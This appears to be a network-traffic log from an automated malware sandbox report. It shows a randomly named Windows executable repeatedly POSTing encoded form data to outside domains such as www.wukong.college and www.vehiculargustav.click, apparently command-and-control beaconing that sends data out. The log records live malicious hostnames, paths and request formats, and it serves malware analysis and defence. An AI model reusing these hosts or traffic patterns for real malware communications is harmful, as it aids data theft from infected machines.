                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp"}</script></head></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.65002047.52.221.8801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:47.055669069 CET643OUTPOST /9ezc/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.wukong.college
                                                                                                                                Origin: http://www.wukong.college
                                                                                                                                Referer: http://www.wukong.college/9ezc/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 44 45 50 39 65 75 7a 6c 61 43 48 63 64 6a 39 45 6b 47 47 38 7a 4d 6a 57 48 50 39 6f 68 55 76 78 32 36 71 65 62 41 47 30 72 57 4d
                                                                                                                                Data Ascii: bdlD=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVDEP9euzlaCHcdj9EkGG8zMjWHP9ohUvx26qebAG0rWM
                                                                                                                                Nov 18, 2024 16:27:48.014234066 CET390INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:47 GMT
                                                                                                                                Server: Apache
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Content-Encoding: gzip
                                                                                                                                Content-Length: 179
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                                                                Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                34192.168.2.65002147.52.221.8801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:49.596662998 CET667OUTPOST /9ezc/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.wukong.college
                                                                                                                                Origin: http://www.wukong.college
                                                                                                                                Referer: http://www.wukong.college/9ezc/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 73 68 57 46 58 50 6f 42 55 46 7a 32 43 71 4d 4d 4d 68 37 66 7a 76 37 5a 6f 57 75 36 72 59 69 52 64 4f 4f 79 4a 56 72 6b 6f 76 74 67 3d 3d
                                                                                                                                Data Ascii: bdlD=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujshWFXPoBUFz2CqMMMh7fzv7ZoWu6rYiRdOOyJVrkovtg==
                                                                                                                                Nov 18, 2024 16:27:50.615485907 CET390INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:50 GMT
                                                                                                                                Server: Apache
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Content-Encoding: gzip
                                                                                                                                Content-Length: 179
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                                                                Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                35192.168.2.65002247.52.221.8801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:52.142779112 CET1680OUTPOST /9ezc/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.wukong.college
                                                                                                                                Origin: http://www.wukong.college
                                                                                                                                Referer: http://www.wukong.college/9ezc/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 6e 78 6c 48 74 5a 33 76 73 36 69 30 43 5a 49 6e 52 2b 67 4a 68 56 71 39 63 53 76 51 4a 77 46 6e 47 6e 6a 69 78 71 33 75 31 79 4e 70 6b 30 77 67 6e 71 79 61 73 49 63 71 68 71 31 4a 49 37 4e 4a 67 37 33 68 61 75 52 57 66 6d 43 53 57 77 74 48 41 4c 4a 68 46 4a 6d 48 51 39 61 66 64 4f 50 62 47 62 37 6c 2b 43 63 6d 38 4c 4e 4b 57 6d 48 6e 71 61 71 49 6e 6f 56 51 70 69 2b 6f 79 69 6b 4b 32 4d 59 61 48 64 66 30 47 4e 78 69 67 74 46 53 2f 50 67 30 6b 6c 36 55 47 6b 64 39 51 77 6d 65 4c 58 33 38 30 41 67 4c 69 44 69 33 74 69 49 57 34 33 2f 6d 6f 69 2b 59 31 43 35 6b 6c 2b 70 49 76 48 53 48 69 5a 55 69 54 2b 6d 75 5a 73 32 71 4d 63 72 68 31 71 46 70 52 63 6a 35 71 78 70 36 53 6f 72 76 76 50 35 73 6a 67 77 41 62 54 33 4a 69 4d 47 46 72 54 33 34 4b 56 73 4a 48 6b 73 44 2b 63 76 4c 76 36 66 33 73 46 68 63 57 58 47 6f 4d 67 6d 34 42 33 6d 6f 6c 7a 7a 4d 4b 41 47 48 33 65 34 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7WqnxlHtZ3vs6i0CZInR+gJhVq9cSvQJwFnGnjixq3u1yNpk0wgnqyasIcqhq1JI7NJg73hauRWfmCSWwtHALJhFJmHQ9afdOPbGb7l+Ccm8LNKWmHnqaqInoVQpi+oyikK2MYaHdf0GNxigtFS/Pg0kl6UGkd9QwmeLX380AgLiDi3tiIW43/moi+Y1C5kl+pIvHSHiZUiT+muZs2qMcrh1qFpRcj5qxp6SorvvP5sjgwAbT3JiMGFrT34KVsJHksD+cvLv6f3sFhcWXGoMgm4B3molzzMKAGH3e4MpWASodl/8QHjwTElTFp2oso7scIaGNAGSOhWXVj7rf/fUnHGo9qOylw5vJ44I3Cd/mPoDIG8Am60KWgrTDQvb40H/0bFkCDp9+X5LjK1tpwImPwxaqmfAJUavWiVn9H7kX2JrT/f1Nk2oAiIaOPK0GAFwxIQwNaknBOTY09zU3s0tOOUrmxv3v4TeZ7aLWOhfeyhARU2vMEpWiMZdVBBrduBB/LknqH0iAYCEghDl5rgGxxAtB03e3BWce7zGhOdf1sD1WWTqSHbU+4izJg6HsAzjIDJJleBxEo/3p6EjDyAzRQvKF/kBX09x/YtlWNJKi1V3C5oZK+Uwb40hpmlXIku6XRixmrFE+T2bzPNT8WGoMHm1eZArqbJB37gxPPBgIRIHRGpKfwvU8oSLUasVvbT7+iVX8q/iw6ZYuaXx/7RNHY6nHmUfFly9HFoFqqqcBwfKeyLa5OKKrJLBM/1g16wgaFw2nCDpwT0nLmdJIrfuhYqxeZxnmi9cQBztBLCrdhvykbznWLHvaSU8hfzRI+KYgbsyY9ByFu9yRv+CDocQKzJQKpUIpVK5YzSRQ8IP90xdg+4pb2UONrlRgJUIRrXyEbTUnOYo2PgP9w3ZAyjSosMXG6nP0tE8SNxhdWhBY0qWTLRfrJZAzjXel4LjDpCREI0r2l8l [TRUNCATED]
                                                                                                                                Nov 18, 2024 16:27:53.119647980 CET390INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:52 GMT
                                                                                                                                Server: Apache
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Content-Encoding: gzip
                                                                                                                                Content-Length: 179
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                                                                Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                36192.168.2.65002347.52.221.8801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:27:54.705920935 CET390OUTGET /9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA= HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.wukong.college
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:27:55.661092997 CET390INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:55 GMT
                                                                                                                                Server: Apache
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                37192.168.2.65002423.106.59.18801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:00.999463081 CET664OUTPOST /95c0/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.vehiculargustav.click
                                                                                                                                Origin: http://www.vehiculargustav.click
                                                                                                                                Referer: http://www.vehiculargustav.click/95c0/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 4f 76 55 72 47 31 59 43 64 37 6a 38 53 50 2b 61 51 73 71 4b 54 6a 4d 4e 70 43 32 50 48 48 6e 6a 34 4a 55 45 68 7a 41 70 78 7a 52 4e 6e 38 30 76 59 79 31 34 4b 59 35 45 2f 64 6c 48 39 64 6c 72 35 55 62 42 41 46 33 34 59 66 64 2f 6d 57 34 45 30 59 61 50 65 61 67 33 30 4d 50 78 71 49 74 56 47 34 37 5a 4e 62 45 63 68 71 54 62 47 46 69 67 68 67 6c 6d 66 6f 6c 36 2f 4c 4f 44 6f 70 32 68 32 43 2b 6f 62 41 75 37 68 45 2b 66 45 78 4f 47 67 42 35 4c 6c 73 6a 64 49 66 2b 34 66 6e 31 43 30 66 59 44 72 32 32 68 56 78 41 72 6f 44 34 4f 68 64 4c 56 61 4b 51 4c 32 62 50 4d 6f 66 34 54
                                                                                                                                Data Ascii: bdlD=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5LlsjdIf+4fn1C0fYDr22hVxAroD4OhdLVaKQL2bPMof4T
                                                                                                                                Nov 18, 2024 16:28:01.817152977 CET423INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:59 GMT
                                                                                                                                Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.65002523.106.59.18801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:03.562640905 CET688OUTPOST /95c0/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.vehiculargustav.click
                                                                                                                                Origin: http://www.vehiculargustav.click
                                                                                                                                Referer: http://www.vehiculargustav.click/95c0/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 54 6a 39 64 59 45 67 79 41 70 39 54 52 4e 76 63 30 6d 56 53 31 7a 4b 59 31 69 2f 59 46 48 39 64 5a 72 35 52 6e 42 63 69 44 33 5a 50 64 78 74 32 34 43 70 49 61 50 65 61 67 33 30 49 66 4c 71 49 31 56 47 49 4c 5a 4d 36 45 62 76 4b 54 59 48 46 69 67 6c 67 6c 69 66 6f 6c 45 2f 4a 37 4c 6f 73 36 68 32 44 4f 6f 61 53 4b 36 75 45 2b 64 41 78 50 6b 6b 7a 30 63 2f 4d 54 65 52 50 57 4b 46 48 6c 50 34 4a 46 5a 33 46 32 43 48 68 67 70 6f 42 67 38 68 39 4c 2f 59 4b 6f 4c 6b 4d 44 72 6e 72 64 77 49 55 64 36 7a 39 4e 4c 34 4c 6e 52 64 30 66 6f 4e 2b 38 61 5a 41 3d 3d
                                                                                                                                Data Ascii: bdlD=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Tj9dYEgyAp9TRNvc0mVS1zKY1i/YFH9dZr5RnBciD3ZPdxt24CpIaPeag30IfLqI1VGILZM6EbvKTYHFiglglifolE/J7Los6h2DOoaSK6uE+dAxPkkz0c/MTeRPWKFHlP4JFZ3F2CHhgpoBg8h9L/YKoLkMDrnrdwIUd6z9NL4LnRd0foN+8aZA==
                                                                                                                                Nov 18, 2024 16:28:04.352308989 CET423INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:28:01 GMT
                                                                                                                                Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                39192.168.2.65002623.106.59.18801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:06.112718105 CET1701OUTPOST /95c0/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.vehiculargustav.click
                                                                                                                                Origin: http://www.vehiculargustav.click
                                                                                                                                Referer: http://www.vehiculargustav.click/95c0/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 4c 6a 68 2b 51 45 76 78 59 70 2b 54 52 4e 77 73 30 6a 56 53 31 55 4b 59 74 2b 2f 59 41 79 39 59 56 72 34 7a 66 42 51 48 76 33 58 50 64 78 77 6d 34 44 30 59 62 56 65 61 77 7a 30 4d 44 4c 71 49 31 56 47 4c 54 5a 4c 72 45 62 74 4b 54 62 47 46 69 6b 68 67 6c 4b 66 6f 73 2f 2f 4a 76 62 6f 66 79 68 34 44 65 6f 63 67 53 36 78 30 2b 44 4e 52 50 43 6b 7a 35 62 2f 50 6d 76 52 50 53 73 46 42 5a 50 36 38 67 64 6e 41 57 4c 46 43 45 7a 39 43 55 56 73 35 4c 56 56 61 6f 67 6b 4e 76 6f 67 50 55 54 44 77 42 6e 2b 38 63 39 32 64 72 63 56 6b 69 30 44 36 39 4b 50 44 75 65 6b 42 46 51 6f 6e 52 65 46 58 59 51 65 36 47 36 68 6d 45 52 6b 6f 55 6c 46 70 56 61 63 50 4b 6b 64 59 66 30 31 50 43 56 72 76 6a 4f 52 4c 70 32 6a 44 47 61 6c 48 53 47 45 66 34 6b 42 54 79 38 66 79 6f 67 44 71 58 70 2f 6d 77 52 42 70 57 44 33 4f 56 59 35 34 2b 38 2b 36 74 49 6b 77 67 77 67 33 38 37 2f 67 54 39 43 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Ljh+QEvxYp+TRNws0jVS1UKYt+/YAy9YVr4zfBQHv3XPdxwm4D0YbVeawz0MDLqI1VGLTZLrEbtKTbGFikhglKfos//Jvbofyh4DeocgS6x0+DNRPCkz5b/PmvRPSsFBZP68gdnAWLFCEz9CUVs5LVVaogkNvogPUTDwBn+8c92drcVki0D69KPDuekBFQonReFXYQe6G6hmERkoUlFpVacPKkdYf01PCVrvjORLp2jDGalHSGEf4kBTy8fyogDqXp/mwRBpWD3OVY54+8+6tIkwgwg387/gT9C22ZmQNe5BAzSqswHOcKV+9g1HpMyYSU1tYTEASaynEuLSmLsRZQXcPrOeHMc8rOanOZf7xUA/lJMN12oM5Dgy+rdD2DC5UYC91OlfBEE80uXy6DcLrG+men0BqQmRpDP4dEclToIkiS8f+Hmbrp/IcUP7WIlBOiF3QozB+0Bh8TU7yuIKjyAnSi99inRsxnNS+Ya1RPCljSMvVZo2MLEjvyy7dJt/EJYC8gxnliDEsThjkWcGn7PiAtXo+dY4OVkWw3PSFbkhgYZZOgGusEAA1trG0G5PMulMXmjI9QfSbqWAjDfqlTDPf/h9nBhp5lUXlhejxMROfZTH+MhLytVRz2Md4LFM2EtLiZjz5FB0cJgC/+Xne1UjGw9HcAafg15K1Z1QFU9iPM7Zhnkxt+JUSTvqHoPvEgM7QECEL1LMtn2wU78mmrisfEYR0sKICuLdxWuqPo5ZXmhNOV/Ua2lEQMT6ZeJ0ieDgkYj1+UEiKb9gqbJNbeQDEPXz3nRQsn0ySQ+rr+SbWgCsMZZ/zcJa8GRrdGKDvaXsRZZVk/5oYFl+Jtxv6ibpNbM5mMqatwOKd6VZ36POyUa/RohW4xoJ28yaw9c5H1aMTTQ7wsF89qLOjRZi6h8GFWN7OeCrTr3n45AyOkJqzHx1cpH5KVbcEKPPxenZ36Fan [TRUNCATED]
